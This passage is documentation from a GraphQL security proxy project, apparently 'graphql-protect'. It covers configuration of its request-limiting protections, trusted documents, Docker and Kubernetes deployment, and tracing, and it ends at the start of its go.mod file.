[graphql-js](https://github.com/graphql/graphql-js) as a reference implementation, resulting a similar level of graphql spec support. 47 | 48 | If experience any issues related to spec support, or you want to verify the (draft spec) feature you want to use is supported, it's best to inspect the gqlparser library directly for your use case. 49 | 50 | ### Response encoding 51 | 52 | Currently, handling encoded responses from the upstream is not supported, we're open for contributions : ) 53 | -------------------------------------------------------------------------------- /docs/assets/banner.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/supportivefe/graphql-protect/943ff0979a470b48b70dc3e27943061d6cdb520a/docs/assets/banner.jpeg -------------------------------------------------------------------------------- /docs/configuration.md: -------------------------------------------------------------------------------- 1 | # Configuration 2 | 3 | `graphql-protect` can be configured via a `protect.yml`. file 4 | 5 | 6 | 7 | # protect.yml 8 | 9 | The default location to configure `graphql-protect` is by specifying a `protect.yml` in the same directory as you're running the binary. 10 | 11 | The following outlines the structure of the yaml, as well as outlines the **defaults** for each configuration option. 12 | 13 | ```yaml 14 | web: 15 | # Maximum duration to read the entire request 16 | read_timeout: 5s 17 | # Maximum duration before timing out writes of the response 18 | write_timeout: 10s 19 | # Maximum time to wait between idle requests for keep alive 20 | idle_timeout: 120s 21 | # Time to wait until forcibly shutting down protect, after receiving a shutdown signal 22 | shutdown_timeout: 20s 23 | # host and port to listen on 24 | host: 0.0.0.0:8080 25 | # path that receives GraphQL traffic 26 | path: /graphql 27 | # limit the maximum size of a request body that is allowed 28 | # this helps prevent OOM attacks through excessively large request payloads. 29 | # A limit of `0` disables this protection. 30 | request_body_max_bytes: 102400 31 | 32 | target: 33 | # Target host and port to send traffic to after validating 34 | host: http://localhost:8081 35 | # Dial timeout waiting for a connection to complete with the target upstream 36 | timeout: 10s 37 | # Interval of keep alive probes 38 | keep_alive: 180s 39 | tracing: 40 | # Headers to redact when sending tracing information 41 | redacted_headers: [] 42 | 43 | schema: 44 | # Path to a local file in which the schema can be found 45 | path: "./schema.graphql" 46 | # Automatically reload the schema file. 47 | # It will reload the contents of the file referenced by the `schema.path` configuration option 48 | # after each `schema.auto_reload.interval` has passed. 49 | auto_reload: 50 | # Enable automatic file reloading 51 | enabled: true 52 | # The interval in which the schema file should be reloaded 53 | interval: 5m 54 | 55 | # Configures whether we obfuscate graphql-protect validation errors such as max_aliases/max_tokens 56 | # Recommended to set it to 'true' for public environments 57 | obfuscate_validation_errors: false 58 | 59 | # Configures if upstream errors need to be obfuscated, this can help you hide internals of your upstream landscape 60 | obfuscate_upstream_errors: true 61 | 62 | persisted_operations: 63 | # Enable or disable the feature, disabled by default 64 | enabled: false 65 | # configures a '/internal/debug_trusted_documents' endpoint to print the persisted operations as json 66 | # Make sure you DONT expose this endpoint publicly if you enable this feature! 67 | enable_debug_endpoint: false 68 | # Fail unknown operations, disable this feature to allow unknown operations to reach your GraphQL API 69 | reject_on_failure: true 70 | # Loader decides how persisted operations are loaded, see loader chapter for more details 71 | loader: 72 | # Type of loader to use 73 | type: local 74 | # Location to load persisted operations from 75 | location: ./store 76 | # Whether to reload persisted operations periodically 77 | reload: 78 | enabled: true 79 | # The interval in which the persisted operations are refreshed 80 | interval: 5m0s 81 | # The timeout for the refreshing operation 82 | timeout: 10s 83 | 84 | block_field_suggestions: 85 | enabled: true 86 | mask: "[redacted]" 87 | 88 | max_aliases: 89 | # Enable the feature 90 | enabled: true 91 | # The maximum number of allowed aliases within a single request. 92 | max: 15 93 | # Reject the request when the rule fails. Disable this to allow the request 94 | reject_on_failure: true 95 | 96 | max_depth: 97 | # protects against operations being too deep 98 | field: 99 | enabled: true 100 | # The maximum allowed depth within a single request. 101 | max: 15 102 | # Reject the request when the rule fails. Disable this to allow the request 103 | reject_on_failure: true 104 | # protects against lists being nested too many times 105 | list: 106 | enabled: true 107 | # The maximum allowed depth within a single request. 108 | max: 15 109 | # Reject the request when the rule fails. Disable this to allow the request 110 | reject_on_failure: true 111 | 112 | max_tokens: 113 | # Enable the feature 114 | enabled: true 115 | # The maximum number of allowed tokens within a single request. 116 | max: 10000 117 | # Reject the request when the rule fails. Disable this to allow the request regardless of token count. 118 | reject_on_failure: true 119 | 120 | max_batch: 121 | # Enable the feature 122 | enabled: true 123 | # The maximum number of operations within a single batched request. 124 | max: 5 125 | # Reject the request when the rule fails. Disable this to allow the request regardless of token count. 126 | reject_on_failure: true 127 | 128 | enforce_post: 129 | # Enable enforcing POST http method 130 | enabled: true 131 | 132 | # Enable or disable logging of graphql errors 133 | log_graphql_errors: false 134 | 135 | log: 136 | # text, or json for structured logging 137 | format: text 138 | ``` 139 | 140 | For a more in-depth view of each option visit the accompanying documentation page of each individual protection. 141 | 142 | ## Graphql protect - validate run mode 143 | While the validate run mode works with the same config as the normal mode, for simplicity's sake you can leave out quite some unused options. 144 | As an example checkout the config below: 145 | 146 | ```yaml 147 | schema: 148 | # Path to a local file in which the schema can be found 149 | path: "./schema.graphql" 150 | 151 | persisted_operations: 152 | enabled: true 153 | # Store is the location on local disk where graphql-protect can find the persisted operations, it loads any `*.json` files on disk 154 | loader: 155 | # Type of loader to use 156 | type: local 157 | # Location to load persisted operations from 158 | location: ./store 159 | 160 | max_aliases: 161 | # Enable the feature 162 | enabled: true 163 | # The maximum number of allowed aliases within a single request. 164 | max: 15 165 | 166 | block_field_suggestions: 167 | enabled: true 168 | mask: "[redacted]" 169 | 170 | max_depth: 171 | enabled: true 172 | # The maximum allowed depth within a single request. 173 | max: 15 174 | 175 | max_tokens: 176 | # Enable the feature 177 | enabled: true 178 | # The maximum number of allowed tokens within a single request. 179 | max: 10000 180 | 181 | max_batch: 182 | # Enable the feature 183 | enabled: true 184 | # The maximum number of operations within a single batched request. 185 | max: 5 186 | ``` -------------------------------------------------------------------------------- /docs/http.md: -------------------------------------------------------------------------------- 1 | # HTTP Configuration 2 | 3 | ## HTTP server configuration 4 | 5 | ```yaml 6 | web: 7 | # Maximum duration to read the entire request 8 | read_timeout: 5s 9 | # Maximum duration before timing out writes of the response 10 | write_timeout: 10s 11 | # Maximum time to wait between idle requests for keep alive 12 | idle_timeout: 120s 13 | # Time to wait until forcibly shutting down protect, after receiving a shutdown signal 14 | shutdown_timeout: 20s 15 | # host and port to listen on 16 | host: 0.0.0.0:8080 17 | # path that receives GraphQL traffic 18 | path: /graphql 19 | # limit the maximum size of a request body that is allowed 20 | # this helps prevent OOM attacks through excessively large request payloads. 21 | # A limit of `0` disables this protection. 22 | request_body_max_bytes: 102400 23 | 24 | target: 25 | # Target host and port to send traffic to after validating 26 | host: http://localhost:8081 27 | # Dial timeout waiting for a connection to complete with the target upstream 28 | timeout: 10s 29 | # Interval of keep alive probes 30 | keep_alive: 180s 31 | tracing: 32 | # Headers to redact when sending tracing information 33 | redacted_headers: [] 34 | ``` 35 | 36 | ## HTTP Request Body Max Byte size 37 | 38 | To prevent OOM attacks through excessively large request bodies, a default limit is posed on request body size of `100kb`. This limit is generally speaking ample space for GraphQL request bodies, while also providing solid protections. 39 | 40 | You can modify this limit by changing the following configuration option 41 | 42 | ```yaml 43 | web: 44 | # limit the maximum size of a request body that is allowed 45 | # this helps prevent OOM attacks through excessively large request payloads. 46 | # A limit of `0` disables this protection. 47 | request_body_max_bytes: 102400 48 | ``` 49 | 50 | ### Metrics 51 | 52 | A metric is exposed to track if and when a request is rejected that exceeds this limit. 53 | 54 | ``` 55 | graphql_protect_http_request_max_body_bytes_exceeded_count{} 56 | ``` 57 | 58 | No metrics are produced for requests that do not exceed this limit. -------------------------------------------------------------------------------- /docs/protections/access_logging.md: -------------------------------------------------------------------------------- 1 | # Access Logging 2 | 3 | In some cases you want to keep a record of what operations were performed against your landscape. The access logging protection can provide that for you. 4 | Access logging is done to STDOUT. 5 | 6 | 7 | 8 | ## Configuration 9 | 10 | You can configure `graphql-protect` to enable access logging for incoming operaitons. 11 | 12 | ```yaml 13 | access_logging: 14 | # Enable the feature, 15 | enabled: true 16 | include_headers: 17 | # Include any headers of interest here 18 | - Authorization 19 | # Include the operation name in the access log record 20 | include_operation_name: true 21 | # Include the variables in the access log record 22 | include_variables: true 23 | # Include the payload in the access log record 24 | include_payload: true 25 | ``` 26 | 27 | ## How does it work? 28 | 29 | For each operation we'll produce an access log record according to your provided configuration. 30 | 31 | If used in conjunction with persisted operations the access log will be produced after the operation is swapped for the payload, meaning you have full access to the operation name and payload. -------------------------------------------------------------------------------- /docs/protections/block_field_suggestions.md: -------------------------------------------------------------------------------- 1 | # Field Suggestions 2 | 3 | Field suggestions in a GraphQL server, though convenient, can pose risks. They can reveal internal details, like field or operation names, potentially aiding malicious actors. 4 | 5 | Disabling field suggestions prevent the discovery of your GraphQL schema even when Introspection is disabled. 6 | 7 | 8 | 9 | ## Configuration 10 | 11 | You can configure `graphql-protect` to remove field suggestions from your API. 12 | 13 | ```yaml 14 | block_field_suggestions: 15 | # Enable the feature, this will remove any field suggestions on your API 16 | enable: true 17 | # The mask to apply whenever a field suggestion is found. The entire message will be replaced with this string 18 | mask: [redacted] 19 | ``` 20 | 21 | ## How does it work? 22 | 23 | We scan each `errors[].message` field in the responses and replace the message with a mask when we encounter a field suggestion. 24 | 25 | ## Metrics 26 | 27 | This rule produces metrics to help you gain insights into the behavior of the rule. 28 | 29 | ``` 30 | graphql_protect_block_field_suggestions_results{result} 31 | ``` 32 | 33 | | `result` | Description | 34 | |----------|---------------------------------------------------------------------| 35 | | `masked` | The rule found suggestions and masked the error message | 36 | | `unmasked` | means the rule found no suggestions and did not alter the response | 37 | 38 | 39 | No metrics are produced when the rule is disabled. -------------------------------------------------------------------------------- /docs/protections/enforce_post.md: -------------------------------------------------------------------------------- 1 | # Enforce POST 2 | 3 | A rule that enforces the use of HTTP POST method when sending operations to the upstream GraphQL API. 4 | 5 | The rule will block requests with non-POST HTTP methods **only** if the requests contain GraphQL operations. If no operation is found it will still forward the request to the upstream. This is useful for accessing GraphiQL for example through GraphQL Protect. 6 | 7 | 8 | 9 | 10 | ## Configuration 11 | 12 | ```yaml 13 | enforce_post: 14 | # Enable the feature 15 | enable: true 16 | ``` 17 | 18 | ## Metrics 19 | 20 | This rule produces metrics to help you gain insights into the behavior of the rule. 21 | 22 | ``` 23 | graphql_protect_enforce_post_count{} 24 | ``` 25 | 26 | No metrics are produced when the rule is disabled or never encounters operations through a non-POST request. -------------------------------------------------------------------------------- /docs/protections/max_aliases.md: -------------------------------------------------------------------------------- 1 | # Max Aliases 2 | 3 | Restricting the maximum number of aliases that are allowed within a single operation protects your API from Brute Force attacks. 4 | 5 | Aliases allow you to perform the same operation multiple times, within a single request. This opens up the possibility of for example trying out login operations 1000 times with 1 request. 6 | Or even worse, uploading a 1 MB image with 1000 aliases in 1 request using the same binary data, essentially creating a Denial of Service attack on your API with 1MB of data, resulting in 1GB of data processed on the server. 7 | 8 | 9 | 10 | ## Configuration 11 | 12 | You can configure `graphql-protect` to limit the maximum number of aliases allowed on an operation. 13 | 14 | ```yaml 15 | max_aliases: 16 | # Enable the feature 17 | enable: true 18 | # The maximum number of allowed aliases within a single request. 19 | max: 15 20 | # Reject the request when the rule fails. Disable this to allow the request 21 | reject_on_failure: true 22 | ``` 23 | 24 | ## Metrics 25 | 26 | This rule produces metrics to help you gain insights into the behavior of the rule. 27 | 28 | ``` 29 | graphql_protect_max_aliases_results{result} 30 | ``` 31 | 32 | 33 | | `result` | Description | 34 | |---------|--------------------------------------------------------------------------------------------------------------| 35 | | `allowed` | The rule condition succeeded | 36 | | `rejected` | The rule condition failed and the request was rejected | 37 | | `failed` | The rule condition failed but the request was not rejected. This happens when `reject_on_failure` is `false` | 38 | 39 | No metrics are produced when the rule is disabled. -------------------------------------------------------------------------------- /docs/protections/max_batch.md: -------------------------------------------------------------------------------- 1 | # Max Batch 2 | 3 | Restricts the maximum number of operations inside a batched request. This helps prevent an excessive number of operations reaching your landscape through minimal requests. 4 | This can be useful to prevent DDoS attacks, Heap Overflows or Server overload. 5 | 6 | 7 | 8 | ## Configuration 9 | 10 | You can configure `graphql-protect` to limit the maximum number of operations allowed inside a batch request. 11 | 12 | ```yaml 13 | max_batch: 14 | # Enable the feature 15 | enable: true 16 | # The maximum number of operations within a single batched request. 17 | max: 5 18 | # Reject the request when the rule fails. Disable this to allow the request regardless of token count. 19 | reject_on_failure: true 20 | ``` 21 | 22 | ## Metrics 23 | 24 | This rule produces metrics to help you gain insights into the behavior of the rule. 25 | 26 | ``` 27 | graphql_protect_max_batch_results{result, size} 28 | ``` 29 | | `size` | Description | 30 | |-------------|-------------------------------------------------------------------------------------------------------------------------------------------| 31 | | `{integer}` | The actual integer value of the observed size, only if the operations was allowed by the rule | 32 | | `exceeded` | Whenever the operation was rejected or failed, `exceeded` is tracked. This is to prevent excessive metric generation upon malicious input | 33 | 34 | | `result` | Description | 35 | |---------|--------------------------------------------------------------------------------------------------------------| 36 | | `allowed` | The rule condition succeeded | 37 | | `rejected` | The rule condition failed and the request was rejected | 38 | | `failed` | The rule condition failed but the request was not rejected. This happens when `reject_on_failure` is `false` | 39 | 40 | No metrics are produced when the rule is disabled. -------------------------------------------------------------------------------- /docs/protections/max_depth.md: -------------------------------------------------------------------------------- 1 | # Max depth 2 | 3 | Max depth protections provide mechanisms for limiting the maximum field and nested lists. 4 | Field depth restricts the depth of fields. 5 | List depth restricts the amount of times lists can be nested. 6 | 7 | Restricting the maximum depth of operations protect your API from abuse. 8 | 9 | 10 | 11 | ## Configuration 12 | 13 | You can configure `graphql-protect` to limit the maximum depth on an operation. 14 | 15 | ```yaml 16 | max_depth: 17 | # [deprecated, see field object] Enable the feature 18 | enable: true 19 | # [deprecated, see field object] The maximum depth allowed within a single request. 20 | max: 15 21 | # [deprecated, see field object] Reject the request when the rule fails. Disable this to allow the request 22 | reject_on_failure: true 23 | # maximum field depth protections 24 | field: 25 | # Enable the protection 26 | enabled: false 27 | # The maximum depth allowed within a single document 28 | max: 1 29 | # Reject the document when the rule fails. Disable this to allow the document to be passed on to your API. 30 | reject_on_failure: false 31 | # maximum list depth protection, limits the depth of nested lists 32 | list: 33 | # Enable the protection 34 | enabled: false 35 | # The maximum depth allowed within a single document. 36 | max: 1 37 | # Reject the document when the rule fails. Disable this to allow the document to be passed on to your API. 38 | reject_on_failure: false 39 | ``` 40 | 41 | ## Field protection 42 | 43 | Ensures operations aren't too deep. Limiting this prevents excessive resolver calling, and waterfall processing tying up resources on your server. 44 | 45 | The below field is an example operation that shows the depth of each field in the operation. 46 | ```graphql 47 | { 48 | user { (1) 49 | address { (2) 50 | country { (3) 51 | contintent { (4) 52 | planet { (5) 53 | system { (6) 54 | name (7) 55 | } 56 | } 57 | } 58 | } 59 | } 60 | pet { (2) 61 | name (3) 62 | } 63 | } 64 | } 65 | ``` 66 | 67 | ## List protection 68 | 69 | Checks that lists aren't being nested too many times, leading to potential response amplification attacks 70 | Ensures lists inside your operations aren't being nested too many times. Limiting this prevents potential response amplification attacks. 71 | 72 | The below field is an example operation that shows the depth of each list in the operation. 73 | 74 | ```graphql 75 | { 76 | user { 77 | friends { (1) 78 | friends { (2) 79 | friends { (3) 80 | friends { (4) 81 | friends { (5) 82 | name 83 | } 84 | } 85 | } 86 | } 87 | } 88 | } 89 | } 90 | ``` 91 | 92 | Assuming each person has 100 friends, the above operation would yield `100 * 100 * 100 * 100 * 100` = `10.000.000.000` resources to be fetched. 93 | 94 | ## Metrics 95 | 96 | This rule produces metrics to help you gain insights into the behavior of the rule. 97 | 98 | ``` 99 | graphql_protect_max_depth_results{type, result} 100 | ``` 101 | 102 | | `type` | Description | 103 | |----------|--------------------------------------------------------------------------------------------------------------| 104 | | `field` | Field depth protection rule | 105 | | `list` | List depth protection rule | 106 | 107 | | `result` | Description | 108 | |---------|--------------------------------------------------------------------------------------------------------------| 109 | | `allowed` | The rule condition succeeded | 110 | | `rejected` | The rule condition failed and the request was rejected | 111 | | `failed` | The rule condition failed but the request was not rejected. This happens when `reject_on_failure` is `false` | 112 | 113 | No metrics are produced when the rule is disabled. -------------------------------------------------------------------------------- /docs/protections/max_tokens.md: -------------------------------------------------------------------------------- 1 | # Max Tokens 2 | 3 | Restricting the maximum number of tokens in an operation helps prevent excessively large operations reaching your landscape. 4 | This can be useful to prevent DDoS attacks, Heap Overflows or Server overload. 5 | 6 | 7 | 8 | ## Configuration 9 | 10 | You can configure `graphql-protect` to limit the maximum number of tokens allowed on an operation. 11 | 12 | ```yaml 13 | max_tokens: 14 | # Enable the feature 15 | enable: true 16 | # The maximum number of allowed tokens within a single request. 17 | max: 1000 18 | # Reject the request when the rule fails. Disable this to allow the request regardless of token count. 19 | reject_on_failure: true 20 | ``` 21 | 22 | ## Metrics 23 | 24 | This rule produces metrics to help you gain insights into the behavior of the rule. 25 | 26 | ``` 27 | graphql_protect_max_tokens_results{result} 28 | ``` 29 | 30 | 31 | | `result` | Description | 32 | |---------|--------------------------------------------------------------------------------------------------------------| 33 | | `allowed` | The rule condition succeeded | 34 | | `rejected` | The rule condition failed and the request was rejected | 35 | | `failed` | The rule condition failed but the request was not rejected. This happens when `reject_on_failure` is `false` | 36 | 37 | No metrics are produced when the rule is disabled. -------------------------------------------------------------------------------- /docs/protections/obfuscate_upstream_errors.md: -------------------------------------------------------------------------------- 1 | # Obfuscate upstream errors 2 | 3 | Upstream errors in a GraphQL server, though convenient, can pose risks. They can reveal internal details about the upstream server(s), potentially aiding malicious actors. 4 | 5 | 6 | ## Configuration 7 | 8 | You can configure `graphql-protect` to exclude upstream errors from your API. 9 | 10 | ```yaml 11 | # Configures if upstream errors need to be obfuscated, this can help you hide internals of your upstream landscape 12 | 13 | obfuscate_upstream_errors: true # default 14 | ``` 15 | 16 | ## How does it work? 17 | 18 | If enabled the `errors[].message` field in the response is replaced with an `"Error(s) redacted" message` 19 | -------------------------------------------------------------------------------- /docs/protections/schema.md: -------------------------------------------------------------------------------- 1 | # Schema 2 | 3 | `graphql-protect` needs to know your schema in order to perform its validations. 4 | 5 | 6 | 7 | ## Configuration 8 | 9 | ```yaml 10 | # ... 11 | 12 | schema: 13 | # Path to a local file in which the schema can be found 14 | path: "./schema.graphql" 15 | # Automatically reload the schema file. 16 | # It will reload the contents of the file referenced by the `schema.path` configuration option 17 | # after each `schema.auto_reload.interval` has passed. 18 | auto_reload: 19 | # Enable automatic file reloading 20 | enabled: "true" 21 | # The interval in which the schema file should be reloaded 22 | interval: 5m 23 | ``` 24 | 25 | ## Metrics 26 | 27 | ``` 28 | graphql_protect_schema_reload{state} 29 | ``` 30 | 31 | | `state` | Description | 32 | |-----------|-------------------------------------------------------------| 33 | | `failed` | Reloading the file from local disk has failed | 34 | | `success` | The schema file was successfully reloaded from local disk | 35 | -------------------------------------------------------------------------------- /docs/protections/trusted_documents.md: -------------------------------------------------------------------------------- 1 | # Trusted Documents (Persisted Operations) 2 | 3 | Persisted Operations are essentially an operation allowlist. Persisted Operations provide an additional layer of security to your GraphQL API by disallowing arbitrary queries to be performed against your APIs. 4 | 5 | We recommend that all GraphQL APIs that only intend a specific/known set of clients to use the API should use Persisted Operations. 6 | 7 | ## Why do I most likely need this? 8 | 9 | To best explain why you most likely should be using Trusted Documents, please check out the following resources: 10 | * https://benjie.dev/graphql/trusted-documents 11 | 12 | ## What is the difference between Trusted Documents and Persisted Operations? 13 | 14 | They are the same thing. The intention is to compose a set of operations you expect to happen, typically during the build time of your clients, and load these onto your server. You allow only these operations to be executed through the exchange of the ID (or hash) of these operations. 15 | 16 | Trusted Documents conveys these operations are trusted. 17 | 18 | We use Trusted Documents and Persisted Operations interchangeably in this documentation. 19 | 20 | 21 | 22 | ## Configuration 23 | 24 | You can configure `graphql-protect` to enable Persisted Operations. 25 | 26 | ```yaml 27 | # ... 28 | # Trusted documents uses the same configuration as persisted operations, as they are the same thing. 29 | persisted_operations: 30 | # Enable or disable the feature, disabled by default 31 | enabled: false 32 | # configures a '/internal/debug_trusted_documents' endpoint to print the persisted operations as json 33 | # Make sure you dont expose this ednpoint publicly if you enable this feature! 34 | enable_debug_endpoint: false 35 | # Fail unknown operations, disable this feature to allow unknown operations to reach your GraphQL API 36 | reject_on_failure: true 37 | # Loader decides how persisted operations are loaded, see loader chapter for more details 38 | loader: 39 | # Type of loader to use 40 | type: local 41 | # Location to load persisted operations from 42 | location: ./store 43 | # Whether to reload persisted operations periodically 44 | reload: 45 | enabled: true 46 | # The interval in which the persisted operations are refreshed 47 | interval: 5m0s 48 | # The timeout for the refreshing operation 49 | timeout: 10s 50 | 51 | # ... 52 | ``` 53 | 54 | ## How it works 55 | 56 | `graphql-protect` looks at the location specified for the `loader` and looks for any `*.json` files it can parse for persisted operations. 57 | These loaders can be specified to look at local directories, or remote locations like GCP buckets. 58 | `graphql-protect` will load the persisted operations from the location and update its internal state with any new operations. 59 | 60 | ## Loader 61 | 62 | Currently we have support for the following loaders, specified by the `type` field in the loader configuration: 63 | 64 | * `local` - load persisted operations from local file system, this is the default strategy. If need be this allows you to download files from an unsupported remote location to local storage, and have `graphql-protect` pick up on them. 65 | * `gcp` - load persisted operations from a GCP bucket 66 | * `noop` - no persisted operations are loaded. This is the strategy applied when an unknown type is supplied. 67 | 68 | ## Parsing Structure 69 | 70 | To be able to parse Persisted Operations graphql-protect expects a `key-value` structure for `hash-operation` in the files. 71 | 72 | `any-file.json` 73 | ```json 74 | { 75 | "key": "query { product(id: 1) { id name } }", 76 | "another-key": "query { hello }" 77 | } 78 | ``` 79 | 80 | Once loaded, any incoming operation with a known hash will be modified to include the operations specified as the value. 81 | 82 | ## Request Structure 83 | 84 | We follow the [APQ specification](https://github.com/apollographql/apollo-link-persisted-queries#apollo-engine) for **sending** hashes to the server. 85 | 86 | > **Important:** 87 | > While we use the specification for APQ, be aware that _automatically_ persisting unknown operations is **NOT** supported. 88 | 89 | ## Why we don't support APQ 90 | 91 | Automated Persisted Queries/Operations is essentially the same as Persisted Operations, except a client can send arbitrary operations which will be remembered by the server. 92 | 93 | This completely removes the security benefit of Persisted Operations as any client can still send arbitrary operations. In fact, security is reduced since a malicious user could spam your endpoint with persisted operation registrations which would overflow your store and affect reliability. 94 | 95 | For this reason we do not deem APQ a good practice, and have chosen not to support it. 96 | 97 | ## Generating Persisted Operations from the Client 98 | 99 | In order to utilize this feature you need to generate the persisted operations that each client can perform. 100 | 101 | [GraphQL Code Generator](https://the-guild.dev/graphql/codegen/plugins/presets/preset-client#persisted-documents) 102 | 103 | 104 | ## Metrics 105 | 106 | This rule produces metrics to help you gain insights into the behavior of the rule. 107 | 108 | ``` 109 | graphql_protect_persisted_operations_result_count{state, result} 110 | ``` 111 | 112 | | `state` | Description | 113 | |---------|---------------------------------------------------------------------------------------------------------------------------------------------------------------| 114 | | `unknown` | The rule was not able to do its job. This happens either when `reject_on_failure` is set to `false` or the rule was not able to deserialize the request. | 115 | | `error` | The rule caught an error during request body mutation. | 116 | | `known` | The rule received a hash for which it had a known operation | 117 | 118 | 119 | | `result` | Description | 120 | |---------|-------------------------------| 121 | | `allowed` | The rule allowed the request | 122 | | `rejected` | The rule rejected the request | 123 | 124 | ``` 125 | graphql_protect_persisted_operations_load_result_count{type, result} 126 | ``` 127 | 128 | 129 | | `type` | Description | 130 | |---------|-------------------------------| 131 | | `local` | Loaded using the local loader | 132 | | `gcp` | Loaded using the gcp loader | 133 | | `noop` | Loaded using the noop loader | 134 | 135 | 136 | | `result` | Description | 137 | |-----------|---------------------------| 138 | | `success` | loading was successful | 139 | | `failure` | loading produced an error | 140 | 141 | No metrics are produced when the rule is disabled. 142 | 143 | ``` 144 | graphql_protect_persisted_operations_unique_hashes_in_memory_count{} 145 | ``` 146 | 147 | No metrics are produced when the rule is disabled. 148 | -------------------------------------------------------------------------------- /docs/run/docker.md: -------------------------------------------------------------------------------- 1 | # Docker 2 | 3 | `GraphQL Protect` provides a container image for your convenience. You can use this container image as is. 4 | You may supply configuration files, port mappings and other mounts for the functionalities provided. 5 | 6 | ## Setting up 7 | 8 | #### Pull 9 | 10 | ```shell 11 | docker pull ghcr.io/ldebruijn/graphql-protect:latest 12 | ``` 13 | 14 | #### Run 15 | 16 | ```shell 17 | docker run -p 8080:8080 -v $(pwd)/protect.yml:/app/protect.yml -v $(pwd)/schema.graphql:/app/schema.graphql ghcr.io/ldebruijn/graphql-protect:latest 18 | ``` 19 | 20 | This mounts the necessary configuration and schema files from your local filesystem onto your container, and exposes port 8080 to the host machine. 21 | 22 | ## Networking 23 | 24 | If you want to [reach a process on the host machine](https://docs.docker.com/desktop/networking/#i-want-to-connect-from-a-container-to-a-service-on-the-host), be sure to use `host.docker.internal` as the hostname for the proxy target, instead of `localhost`. 25 | 26 | If you want to reach another container, be sure the two containers are in the [same container network](https://docs.docker.com/network/) to be able to communicate with each other. -------------------------------------------------------------------------------- /docs/run/kubernetes.md: -------------------------------------------------------------------------------- 1 | # Kubernetes 2 | 3 | GraphQL Protect is intended to run as proxy to your main application. This allows it to scale with your application, and enjoys the benefit of loopback networking. 4 | 5 | ## Deployment resource 6 | 7 | This specification describes a minimal example, focussing only on the elements relevant for GraphQL Protect. 8 | 9 | > [!NOTE] 10 | > This is not a complete example, you're expected to mix this in with your existing deployment specification. 11 | 12 | ```yaml 13 | apiVersion: apps/v1 14 | kind: Deployment 15 | metadata: 16 | name: my-graphql-api 17 | spec: 18 | template: 19 | spec: 20 | containers: 21 | - name: my-graphql-api 22 | # Your main app 23 | - name: graphql-protect 24 | # Pin with specific version 25 | image: ghcr.io/ldebruijn/graphql-protect:latest 26 | args: 27 | # Override main command, specify mounted configuration file 28 | - "serve" 29 | - "-f" 30 | - "./config/graphql-protect-config.yml" 31 | ports: 32 | - containerPort: 8080 33 | readinessProbe: 34 | periodSeconds: 1 35 | initialDelaySeconds: 3 36 | failureThreshold: 2 37 | successThreshold: 2 38 | httpGet: 39 | # Readiness probe for GraphQL Protect 40 | path: /internal/healthz/readiness 41 | port: 8080 42 | timeoutSeconds: 1 43 | env: 44 | - name: GOMAXPROCS 45 | valueFrom: 46 | resourceFieldRef: 47 | resource: requests.cpu 48 | volumeMounts: 49 | # Mount GraphQL Protect file in container local file system 50 | - mountPath: /app/config 51 | name: graphql-protect-config 52 | # Mount GraphQL Schema file in container local file system 53 | - mountPath: /app/schema 54 | name: schema-config 55 | # Mount empty dir in container local file system 56 | - mountPath: /app/store 57 | name: persisted-operations-store 58 | volumes: 59 | # Empty dir for storing persisted operations in 60 | - name: persisted-operations-store 61 | emptyDir: { } 62 | # GraphQL Protect configuration file yaml 63 | - name: graphql-protect-config 64 | configMap: 65 | name: graphql-protect-config 66 | # GraphQL schema file 67 | - name: schema.config 68 | configMap: 69 | name: graphql-schema-config 70 | ``` 71 | 72 | ## Config Map Resource 73 | 74 | You can create configmaps with the necessary configuration by running the following command and pointing it to your configuration file. 75 | 76 | ### Protect.yml 77 | 78 | ```shell 79 | kubectl create configmap graphql-protect-config --from-file=protect.yml 80 | ``` 81 | 82 | ### schema.graphql 83 | 84 | ```shell 85 | kubectl create configmap graphql-schema-config --from-file=schema.graphql 86 | ``` 87 | 88 | > [!NOTE] 89 | > As always, make sure you're operating on the right context and namespace when executing these commands. -------------------------------------------------------------------------------- /docs/run/tracing.md: -------------------------------------------------------------------------------- 1 | # Tracing 2 | 3 | Graphql Protect supports OpenTelemetry-based tracing, enhancing observability and monitoring capabilities. 4 | Although the instrumentation is currently limited, it enables the creation of new spans that can be exported to 5 | any OTLP-compatible exporter. 6 | 7 | ## Exporting Traces 8 | 9 | Tracing data exporting relies on [autoexport](https://pkg.go.dev/go.opentelemetry.io/contrib/exporters/autoexport#NewSpanExporter). 10 | Configuration is done via environment variables `OTEL_TRACES_EXPORTER` and `OTEL_EXPORTER_OTLP_PROTOCOL`, which 11 | determine how trace data is exported. For example, setting `OTEL_EXPORTER_OTLP_PROTOCOL` to `grpc` enables gRPC protocol 12 | for exporting data. 13 | 14 | ## Header Propagation 15 | 16 | The system uses [autoprop](https://pkg.go.dev/go.opentelemetry.io/contrib/propagators/autoprop) for header propagation, 17 | configured through the `OTEL_PROPAGATORS` environment variable. Supported propagators include tracecontext, baggage, b3, 18 | and others. This configuration determines how trace context is maintained across different service calls. 19 | 20 | ## Redacting headers 21 | OpenTelemetry might collect HTTP headers that contain sensitive information or PII which are usually not desirable to be 22 | logged in the traces. By default, OpenTelemetry redacts the following headers: `Authorization, WWW-Authenticate, Proxy-Authenticate 23 | Proxy-Authorization, Cookie, Set-Cookie`. 24 | If desired, additional headers can be redacted in `config.yml`. 25 | ```yaml 26 | target: 27 | redacted_headers: 28 | - Some-Private-Header 29 | - Some-Other-Private-Header 30 | ``` 31 | 32 | ### Kubernetes Configuration Example 33 | 34 | Below is an example configuration for Kubernetes, replace v0.11.0 with the version of Graphql Protect you are using. 35 | 36 | ```yaml 37 | # ... 38 | spec: 39 | template: 40 | spec: 41 | containers: 42 | - name: graphql-protect 43 | image: ghcr.io/ldebruijn/graphql-protect:latest # Replace with the appropriate version 44 | env: 45 | - name: OTEL_EXPORTER_OTLP_PROTOCOL 46 | value: grpc 47 | - name: OTEL_PROPAGATORS 48 | value: b3multi,tracecontext,baggage 49 | # ... 50 | ``` 51 | -------------------------------------------------------------------------------- /go.mod: -------------------------------------------------------------------------------- 1 | module github.com/supportivefe/graphql-protect 2 | 3 | go 1.24.0 4 | 5 | require ( 6 | cloud.google.com/go/storage v1.53.0 7 | github.com/jedib0t/go-pretty/v6 v6.6.7 8 | github.com/prometheus/client_golang v1.22.0 9 | github.com/stretchr/testify v1.10.0 10 | github.com/vektah/gqlparser/v2 v2.5.27 11 | go.opentelemetry.io/contrib/exporters/autoexport v0.60.0 12 | go.opentelemetry.io/contrib/instrumentation/net/http/httptrace/otelhttptrace v0.60.0 13 | go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp v0.60.0 14 | 